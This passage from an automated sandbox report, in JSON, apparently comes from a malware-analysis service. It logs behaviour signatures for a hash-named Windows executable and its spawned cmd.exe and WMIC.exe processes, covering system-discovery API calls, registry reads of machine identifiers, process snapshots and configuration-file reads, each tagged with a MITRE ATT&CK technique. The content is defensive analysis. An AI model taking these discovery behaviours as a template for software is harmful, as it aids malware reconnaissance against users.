local language", "description": "\"cmd.exe\" called \"GetLocaleInfoW\" with parameter \"1033\" - (UID: 00000000-00003036)\n \"cmd.exe\" called \"GetLocaleInfoW\" with parameter \"1033\" - (UID: 00000000-00000860)", "origin": "API Call", "attck_id": "T1614", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "registry-1", "type": 3, "relevance": 5, "name": "Reads the cryptographic machine GUID", "description": "\"3a7d45102776702bd32c65e34071db9403ea1a482c42f7a1a919c5ab6baf096b.exe\" (Path: \"HKLM\\SOFTWARE\\MICROSOFT\\CRYPTOGRAPHY\"; Key: \"MACHINEGUID\")\n \"WMIC.exe\" (Path: \"HKLM\\SOFTWARE\\MICROSOFT\\CRYPTOGRAPHY\"; Key: \"MACHINEGUID\")", "origin": "Registry Access", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-148", "type": 6, "relevance": 3, "name": "Calls an API typically used to retrieve account information for specified SID", "description": "\"WMIC.exe\" called \"LookupAccountSidW\" with param Name %OSUSER% (UID: 00000000-00005348)\n \"WMIC.exe\" called \"LookupAccountSidW\" with param Name %OSUSER% (UID: 00000000-00000848)\n \"WMIC.exe\" called \"LookupAccountSidW\" with param Name %OSUSER% (UID: 00000000-00000312)\n \"WMIC.exe\" called \"LookupAccountSidW\" with param Name %OSUSER% (UID: 00000000-00003424)\n \"WMIC.exe\" called \"LookupAccountSidW\" with param Name %OSUSER% (UID: 00000000-00002948)", "origin": "API Call", "attck_id": "T1033", "attck_id_wiki": "https://attack.mitre.org/techniques/T1033"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-124", "type": 6, "relevance": 3, "name": "Calls an API typically used to get product type", "description": "\"WMIC.exe\" called \"RtlGetNtProductType\" with parameter 01000000 (UID: 00000000-00005348)\n \"WMIC.exe\" called \"RtlGetNtProductType\" with parameter 01000000 (UID: 00000000-00004432)\n \"WMIC.exe\" called \"RtlGetNtProductType\" with parameter 01000000 (UID: 00000000-00000848)\n \"WMIC.exe\" called \"RtlGetNtProductType\" with parameter 01000000 (UID: 00000000-00000312)\n \"WMIC.exe\" called \"RtlGetNtProductType\" with parameter 01000000 (UID: 00000000-00003424)\n \"WMIC.exe\" called \"RtlGetNtProductType\" with parameter 01000000 (UID: 00000000-00002948)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-11", "type": 6, "relevance": 2, "name": "Queries volume information", "description": "\"3a7d45102776702bd32c65e34071db9403ea1a482c42f7a1a919c5ab6baf096b.exe\" queries volume information of \"C:\\Users\\%OSUSER%\\NTUSER.DAT\" at 00000000-00005716-0000010C-43722769\n \"3a7d45102776702bd32c65e34071db9403ea1a482c42f7a1a919c5ab6baf096b.exe\" queries volume information of \"C:\\Users\\%OSUSER%\\ntuser.dat.LOG1\" at 00000000-00005716-0000010C-44537049\n \"3a7d45102776702bd32c65e34071db9403ea1a482c42f7a1a919c5ab6baf096b.exe\" queries volume information of \"C:\\Users\\%OSUSER%\\ntuser.dat.LOG2\" at 00000000-00005716-0000010C-45098650\n \"3a7d45102776702bd32c65e34071db9403ea1a482c42f7a1a919c5ab6baf096b.exe\" queries volume information of \"C:\\Users\\%OSUSER%\\NTUSER.DAT{6cced2f1-6e01-11de-8bed-001e0bcd1824}.TM.blf\" at 00000000-00005716-0000010C-45643222\n \"3a7d45102776702bd32c65e34071db9403ea1a482c42f7a1a919c5ab6baf096b.exe\" queries volume information of \"C:\\Users\\%OSUSER%\\NTUSER.DAT{6cced2f1-6e01-11de-8bed-001e0bcd1824}.TMContainer00000000000000000001.regtrans-ms\" at 00000000-00005716-0000010C-46515978\n \"3a7d45102776702bd32c65e34071db9403ea1a482c42f7a1a919c5ab6baf096b.exe\" queries volume information of \"C:\\Users\\%OSUSER%\\NTUSER.DAT{6cced2f1-6e01-11de-8bed-001e0bcd1824}.TMContainer00000000000000000002.regtrans-ms\" at 00000000-00005716-0000010C-47192958\n \"3a7d45102776702bd32c65e34071db9403ea1a482c42f7a1a919c5ab6baf096b.exe\" queries volume information of \"C:\\ProgramData\\Microsoft\\OfficeSoftwareProtectionPlatform\\tokens.dat\" at 00000000-00005716-0000010C-79961483", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-125", "type": 6, "relevance": 3, "name": "Calls an API typically used to get system version information", "description": "\"3a7d45102776702bd32c65e34071db9403ea1a482c42f7a1a919c5ab6baf096b.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005716)\n \"cmd.exe\" called \"RtlGetVersion\" with parameter 000000000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00006072)\n \"WMIC.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005348)\n \"WMIC.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000000000d02d00fdc4005c0001000000000000000a00000008000000688160006881600063816000000000000000000000005c00000000019ce42500000000001ce7250095e12977e23c1700feffffff435c2d7750592d770010000008100000628160006081600001000000ee292d7701000000000000000000000000000000000000001800000035de4d9cc386266b80f724001c000000c8e52500c89f2d7768bc0b6a0000000000000000fce5250025c9ff6933c9ff699ae1522a010000002ce625000300000000000000081000001ce7250018e62500958d016a00005c0008000000 (UID: 00000000-00005348)\n \"WMIC.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005348)\n \"WMIC.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000044f12500000000004200000094f12500feffffff1cf12500cf002e77d6002e77d6df1f77420000002100000094f1250000000000f0f025000000000058f12500 (UID: 00000000-00005348)\n \"cmd.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00003036)\n \"cmd.exe\" called \"RtlGetVersion\" with parameter 000000000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00003036)\n \"WMIC.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000000037310006c4002b0001000000000000000a0000000800000030862f0030862f002b862f00000000000000000000002b0000000001bce51a00000000003ce81a0095e129775f561700feffffff435c2d7750592d7700100000081000002a862f0028862f0001000000ee292d7701000000000000000000000000000000000000001800000098833cd7c386266ba0f819001c000000e8e61a00c89f2d7768bcf76900000000000000001ce71a0025c9eb6933c9eb6912fec6ae010000004ce71a000300000000000000081000003ce81a0038e71a00958ded6900002b0008000000 (UID: 00000000-00004432)\n \"WMIC.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00004432)\n \"WMIC.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00004432)\n \"WMIC.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000006cf21a000000000042000000bcf21a00feffffff44f21a00cf002e77d6002e7733b620774200000021000000bcf21a000000000018f21a000000000080f21a00 (UID: 00000000-00004432)\n \"cmd.exe\" called \"RtlGetVersion\" with parameter 000000000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00004464)\n \"WMIC.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000000050270077c400440001000000000000000a00000008000000688548006885480063854800000000000000000000004400000000010ce02000000000008ce2200095e129770a4d1700feffffff435c2d7750592d770010000008100000628548006085480001000000ee292d7701000000000000000000000000000000000000001800000008bd67f6c386266bf0f21f001c00000038e12000c89f2d7768bc0b6a00000000000000006ce1200025c9ff6933c9ff693d0d0adf010000009ce120000300000000000000081000008ce2200088e12000958d016a0000440008000000 (UID: 00000000-00000848)\n \"WMIC.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00000848)\n \"WMIC.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00000848)\n \"WMIC.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000bcec200000000000420000000ced2000feffffff94ec2000cf002e77d6002e77b6b31a7742000000210000000ced20000000000068ec200000000000d0ec2000 (UID: 00000000-00000848)\n \"cmd.exe\" called \"RtlGetVersion\" with parameter 000000000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00001580)\n \"WMIC.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00000312)\n \"WMIC.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000000000f02900d9c4001c0001000000000000000a00000008000000688020006880200063802000000000000000000000001c00000000013ce60a0000000000bce80a0095e1297797631700feffffff435c2d7750592d770010000008100000628020006080200001000000ee292d77010000000000000000000000000000000000000018000000362b23d2c386266b20f909001c00000068e70a00c89f2d7768bcf76900000000000000009ce70a0025c9eb6933c9eb69b11ae3ca01000000cce70a00030000000000000008100000bce80a00b8e70a00958ded6900001c0008000000 (UID: 00000000-00000312)\n \"WMIC.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00000312)\n \"WMIC.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000e4f20a00000000004200000034f30a00feffffffbcf20a00cf002e77d6002e7703833077420000002100000034f30a000000000090f20a0000000000f8f20a00 (UID: 00000000-00000312)\n \"cmd.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00000860)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-152", "type": 6, "relevance": 3, "name": "Calls an API typically used to enumerate active windows", "description": "\"3a7d45102776702bd32c65e34071db9403ea1a482c42f7a1a919c5ab6baf096b.exe\" called \"EnumWindows\" with parameter \"4757428\" - (UID: 00000000-00005716)\n \"3a7d45102776702bd32c65e34071db9403ea1a482c42f7a1a919c5ab6baf096b.exe\" called \"EnumWindows\" with parameter \"4757492\" - (UID: 00000000-00005716)\n \"3a7d45102776702bd32c65e34071db9403ea1a482c42f7a1a919c5ab6baf096b.exe\" called \"EnumWindows\" with parameter \"4757684\" - (UID: 00000000-00005716)", "origin": "API Call", "attck_id": "T1010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1010"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "registry-35", "type": 3, "relevance": 5, "name": "Reads the active computer name", "description": "\"3a7d45102776702bd32c65e34071db9403ea1a482c42f7a1a919c5ab6baf096b.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\COMPUTERNAME\\ACTIVECOMPUTERNAME\"; Key: \"COMPUTERNAME\")\n \"WMIC.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\COMPUTERNAME\\ACTIVECOMPUTERNAME\"; Key: \"COMPUTERNAME\")", "origin": "Registry Access", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-146", "type": 6, "relevance": 3, "name": "Calls an API typically used to determine if process is running under WOW64", "description": "\"WMIC.exe\" called \"IsWow64Process\" with parameter \"5348\" - (UID: 00000000-00005348)\n \"cmd.exe\" called \"IsWow64Process\" with parameter \"3036\" - (UID: 00000000-00003036)\n \"WMIC.exe\" called \"IsWow64Process\" with parameter \"4432\" - (UID: 00000000-00004432)", "origin": "API Call", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-108", "type": 6, "relevance": 3, "name": "Calls an API typically used to retrieve information about the current system", "description": "\"WMIC.exe\" called \"GetNativeSystemInfo\" with parameters {\"lpSystemInfo\": \"000000000010000000000100fffffe7f03000000040000004a020000000001000600004f\"}", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-102", "type": 6, "relevance": 5, "name": "Calls an API typically used for searching a directory for files", "description": "\"WMIC.exe\" called \"FindFirstFileW\" with parameter %WINDIR%\\system32\\wbem\\XSL-Mappings.xml (UID: 00000000-00005348)\n \"cmd.exe\" called \"FindFirstFileW\" with parameter C:\\ (UID: 00000000-00003036)\n \"WMIC.exe\" called \"FindFirstFileW\" with parameter %WINDIR%\\system32\\wbem\\XSL-Mappings.xml (UID: 00000000-00004432)\n \"WMIC.exe\" called \"FindFirstFileW\" with parameter %WINDIR%\\system32\\wbem\\XSL-Mappings.xml (UID: 00000000-00000848)\n \"WMIC.exe\" called \"FindFirstFileW\" with parameter %WINDIR%\\system32\\wbem\\XSL-Mappings.xml (UID: 00000000-00000312)\n \"cmd.exe\" called \"FindFirstFileW\" with parameter C:\\ (UID: 00000000-00000860)\n \"WMIC.exe\" called \"FindFirstFileW\" with parameter %WINDIR%\\system32\\wbem\\XSL-Mappings.xml (UID: 00000000-00003424)\n \"WMIC.exe\" called \"FindFirstFileW\" with parameter %WINDIR%\\system32\\wbem\\XSL-Mappings.xml (UID: 00000000-00002948)", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-103", "type": 6, "relevance": 3, "name": "Calls an API typically used for taking snapshot of the specified processes", "description": "\"3a7d45102776702bd32c65e34071db9403ea1a482c42f7a1a919c5ab6baf096b.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"WMIC.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"cmd.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}", "origin": "API Call", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "api-219", "type": 6, "relevance": 3, "name": "Calls an API typically used to register an interface (RPC)", "description": "\"3a7d45102776702bd32c65e34071db9403ea1a482c42f7a1a919c5ab6baf096b.exe\" called \"RpcServerRegisterIf2\" (UID: 00000000-00005716)\n \"WMIC.exe\" called \"RpcServerRegisterIf2\" (UID: 00000000-00005348)\n \"WMIC.exe\" called \"RpcServerRegisterIf2\" (UID: 00000000-00004432)\n \"WMIC.exe\" called \"RpcServerRegisterIf2\" (UID: 00000000-00000848)\n \"WMIC.exe\" called \"RpcServerRegisterIf2\" (UID: 00000000-00000312)\n \"WMIC.exe\" called \"RpcServerRegisterIf2\" (UID: 00000000-00003424)\n \"WMIC.exe\" called \"RpcServerRegisterIf2\" (UID: 00000000-00002948)", "origin": "API Call", "attck_id": "T1021", "attck_id_wiki": "https://attack.mitre.org/techniques/T1021"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "api-111", "type": 6, "relevance": 3, "name": "Calls an API typically used to enable or disable privileges in the specified access token", "description": "\"WMIC.exe\" called an API \"AdjustTokenPrivileges\" (UID: 00000000-00005348)\n \"WMIC.exe\" called an API \"AdjustTokenPrivileges\" (UID: 00000000-00004432)\n \"WMIC.exe\" called an API \"AdjustTokenPrivileges\" (UID: 00000000-00000848)\n \"WMIC.exe\" called an API \"AdjustTokenPrivileges\" (UID: 00000000-00000312)\n \"WMIC.exe\" called an API \"AdjustTokenPrivileges\" (UID: 00000000-00003424)\n \"WMIC.exe\" called an API \"AdjustTokenPrivileges\" (UID: 00000000-00002948)", "origin": "API Call", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "api-37", "type": 6, "relevance": 10, "name": "Opens the Kernel Security Device Driver (KsecDD) of Windows", "description": "\"3a7d45102776702bd32c65e34071db9403ea1a482c42f7a1a919c5ab6baf096b.exe\" opened \"\\Device\\KsecDD\"\n \"WMIC.exe\" opened \"\\Device\\KsecDD\"", "origin": "API Call"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "registry-67", "type": 3, "relevance": 10, "name": "Creates or modifies windows services", "description": "\"3a7d45102776702bd32c65e34071db9403ea1a482c42f7a1a919c5ab6baf096b.exe\" (Access type: \"CREATE\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\")", "origin": "Registry Access", "attck_id": "T1543.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543/003"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "registry-173", "type": 3, "relevance": 1, "name": "Queries services related registry keys", "description": "\"3a7d45102776702bd32c65e34071db9403ea1a482c42f7a1a919c5ab6baf096b.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\LANMANWORKSTATION\\PARAMETERS\"; Key: \"RPCCACHETIMEOUT\"; Value: \"\")\n \"3a7d45102776702bd32c65e34071db9403ea1a482c42f7a1a919c5ab6baf096b.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\"; Key: \"HOSTNAME\"; Value: \"\")\n \"3a7d45102776702bd32c65e34071db9403ea1a482c42f7a1a919c5ab6baf096b.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\"; Key: \"DOMAIN\"; Value: \"\")\n \"3a7d45102776702bd32c65e34071db9403ea1a482c42f7a1a919c5ab6baf096b.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\"; Key: \"WINSOCK_REGISTRY_VERSION\"; Value: \"\")\n \"3a7d45102776702bd32c65e34071db9403ea1a482c42f7a1a919c5ab6baf096b.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\"; Key: \"NAMESPACE_CALLOUT\"; Value: \"\")\n \"3a7d45102776702bd32c65e34071db9403ea1a482c42f7a1a919c5ab6baf096b.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\"; Key: \"SERIAL_ACCESS_NUM\"; Value: \"\")\n \"3a7d45102776702bd32c65e34071db9403ea1a482c42f7a1a919c5ab6baf096b.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\"; Key: \"NEXT_CATALOG_ENTRY_ID\"; Value: \"\")\n \"3a7d45102776702bd32c65e34071db9403ea1a482c42f7a1a919c5ab6baf096b.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\"; Key: \"NUM_CATALOG_ENTRIES\"; Value: \"\")\n \"3a7d45102776702bd32c65e34071db9403ea1a482c42f7a1a919c5ab6baf096b.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000001\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"3a7d45102776702bd32c65e34071db9403ea1a482c42f7a1a919c5ab6baf096b.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000002\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"3a7d45102776702bd32c65e34071db9403ea1a482c42f7a1a919c5ab6baf096b.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000003\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"3a7d45102776702bd32c65e34071db9403ea1a482c42f7a1a919c5ab6baf096b.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000004\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"3a7d45102776702bd32c65e34071db9403ea1a482c42f7a1a919c5ab6baf096b.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000005\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"3a7d45102776702bd32c65e34071db9403ea1a482c42f7a1a919c5ab6baf096b.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000006\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1007", "attck_id_wiki": "https://attack.mitre.org/techniques/T1007"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "General", "identifier": "api-6", "type": 6, "relevance": 4, "name": "Reads configuration files (.ini files)", "description": "\"3a7d45102776702bd32c65e34071db9403ea1a482c42f7a1a919c5ab6baf096b.exe\" reads file \"C:\\Program Files\\desktop.ini\"\n \"3a7d45102776702bd32c65e34071db9403ea1a482c42f7a1a919c5ab6baf096b.exe\" reads file \"C:\\Users\\desktop.ini\"\n \"3a7d45102776702bd32c65e34071db9403ea1a482c42f7a1a919c5ab6baf096b.exe\" reads file \"C:\\Program Files\\CCleaner\\cc_config.ini\"\n \"3a7d45102776702bd32c65e34071db9403ea1a482c42f7a1a919c5ab6baf096b.exe\" reads file \"C:\\Program Files\\CCleaner\\winapp2.ini\"\n \"3a7d45102776702bd32c65e34071db9403ea1a482c42f7a1a919c5ab6baf096b.exe\" reads file \"C:\\Program Files\\Mozilla Firefox\\application.ini\"\n \"3a7d45102776702bd32c65e34071db9403ea1a482c42f7a1a919c5ab6baf096b.exe\" reads file \"C:\\Program Files\\Mozilla Firefox\\crashreporter.ini\"\n \"3a7d45102776702bd32c65e34071db9403ea1a482c42f7a1a919c5ab6baf096b.exe\" reads file \"C:\\Program Files\\Mozilla Firefox\\platform.ini\"\n \"3a7d45102776702bd32c65e34071db9403ea1a482c42f7a1a919c5ab6baf096b.exe\" reads file \"C:\\Program Files\\Mozilla Firefox\\update-settings.ini\"\n \"3a7d45102776702bd32c65e34071db9403ea1a482c42f7a1a919c5ab6baf096b.exe\" reads file \"C:\\Program Files\\Mozilla Firefox\\updater.ini\"\n \"3a7d45102776702bd32c65e34071db9403ea1a482c42f7a1a919c5ab6baf096b.exe\" reads file \"C:\\Program Files\\Mozilla Maintenance 